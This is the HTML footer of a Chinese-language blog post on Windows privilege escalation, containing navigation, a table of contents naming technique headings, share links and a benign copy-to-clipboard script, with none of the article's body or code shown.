  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Inici</a></li>
         
          <li><a href="/about/">Qui som</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/ConsT27">Projectes</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A0%E5%BC%95%E5%8F%B7%E6%9C%8D%E5%8A%A1%E8%B7%AF%E5%BE%84-%EF%BC%88-Trusted-Service-Paths-%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">无引号服务路径 （ Trusted Service Paths ）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%98%93%E5%8F%97%E6%94%BB%E5%87%BB%E7%9A%84%E6%9C%8D%E5%8A%A1%EF%BC%88Vulnerable-Services-%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">易受攻击的服务（Vulnerable Services ）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AlwaysInstallElevated"><span class="toc-number">3.</span> <span class="toc-text">AlwaysInstallElevated</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-number">4.</span> <span class="toc-text">信息泄露</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E8%B5%84%E6%BA%90%E7%9A%84%E5%9F%9F%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB"><span class="toc-number">5.</span> <span class="toc-text">基于资源的域委派攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8E%9F%E7%90%86%E7%9A%84%E5%87%A0%E4%B8%AA%E7%82%B9%EF%BC%9A"><span class="toc-number">5.0.1.</span> <span class="toc-text">原理的几个点：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B"><span class="toc-number">5.0.2.</span> <span class="toc-text">攻击流程:</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E6%93%8D"><span class="toc-number">5.0.3.</span> <span class="toc-text">实操</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%95%8F%E6%84%9F%E7%94%A8%E6%88%B7%E4%B8%8D%E5%8F%AF%E5%A7%94%E6%B4%BE%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">5.0.4.</span> <span class="toc-text">敏感用户不可委派的绕过</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POTATO-%E5%AE%B6%E6%97%8F"><span class="toc-number">6.</span> <span class="toc-text">POTATO 家族</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#hot-potato"><span class="toc-number">6.1.</span> <span class="toc-text">hot potato</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MYSQL%E4%B8%8B%E7%9A%84%E6%8F%90%E6%9D%83%E6%8A%80%E6%9C%AF"><span class="toc-number">7.</span> <span class="toc-text">MYSQL下的提权技术</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MOF%E6%8F%90%E6%9D%83"><span class="toc-number">7.1.</span> <span class="toc-text">MOF提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UDF%E6%8F%90%E6%9D%83"><span class="toc-number">7.2.</span> <span class="toc-text">UDF提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8%E9%A1%B9%E6%8F%90%E6%9D%83"><span class="toc-number">7.3.</span> <span class="toc-text">启动项提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%91%BD%E5%90%8D%E7%AE%A1%E9%81%93%E6%8F%90%E6%9D%83"><span class="toc-number">8.</span> <span class="toc-text">命名管道提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A4%E7%89%8C%E7%AA%83%E5%8F%96"><span class="toc-number">9.</span> <span class="toc-text">令牌窃取</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&text=Windows提权方法汇总"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&is_video=false&description=Windows提权方法汇总"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Windows提权方法汇总&body=Check out this article: http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&title=Windows提权方法汇总"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&name=Windows提权方法汇总&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://const27.com/2021/02/19/Windows%E6%8F%90%E6%9D%83/&t=Windows提权方法汇总"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menú</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Compartir</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Cap amunt</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2022
    ConsT27
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Inici</a></li><!--
     --><!--
       --><li><a href="/about/">Qui som</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/ConsT27">Projectes</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"In die Zwischenablage kopiert!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Kopiert!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
